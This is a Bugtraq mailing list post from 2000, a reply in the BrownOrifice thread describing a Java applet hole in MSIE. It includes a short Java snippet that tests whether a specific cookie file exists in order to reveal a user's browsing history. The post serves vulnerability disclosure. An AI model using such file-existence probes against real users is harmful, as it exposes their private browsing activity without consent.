Bugtraq mailing list archives
Re: BrownOrifice can break firewalls! NOW MSIE
From: "TAKAGI, Hiromitsu" <takagi () ETL GO JP>
Date: Thu, 24 Aug 2000 09:35:51 +0900
On Sun, 20 Aug 2000 10:55:59 +0300 Alexey Yarovinsky <ayarovin () OLTRES COM> wrote:
The same security hole, exists in MSIE too, with one restriction: url can't start with file:. But still the applet from outside site, can access you intranet servers including ftps and ALL sites you have access to. The demonstration of the bug is here: http://www.oltres.com/ms-bug/
"file:" url can be used to exploit. Malicious applet certainly cannot read content of files, but it can determine whether the specified file exists or not. try { new WURLConnection("file:/C:/WINDOWS/Cookies/default@playboy[1].txt"); } catch (SecurityException e) { System.out.println("You have visited the Playboy site."); } catch (java.io.FileNotFoundException e) { System.out.println("You may not have visited the Playboy site."); } Regards, -- Hiromitsu Takagi Electrotechnical Laboratory http://www.etl.go.jp/~takagi/
Current thread:
- BrownOrifice can break firewalls! Greulich, Andreas (Aug 10)
- Re: BrownOrifice can break firewalls! TAKAGI, Hiromitsu (Aug 14)
- Re: BrownOrifice can break firewalls! Alexey Yarovinsky (Aug 17)
- JDK 1.1.x Listening Socket Vulnerability (was Re: BrownOrifice can break firewalls!) TAKAGI, Hiromitsu (Aug 18)
- Re: BrownOrifice can break firewalls! TAKAGI, Hiromitsu (Aug 25)
- Re: BrownOrifice can break firewalls! NOW MSIE Alexey Yarovinsky (Aug 21)
- Re: BrownOrifice can break firewalls! NOW MSIE TAKAGI, Hiromitsu (Aug 23)
- Re: BrownOrifice can break firewalls! TAKAGI, Hiromitsu (Aug 14)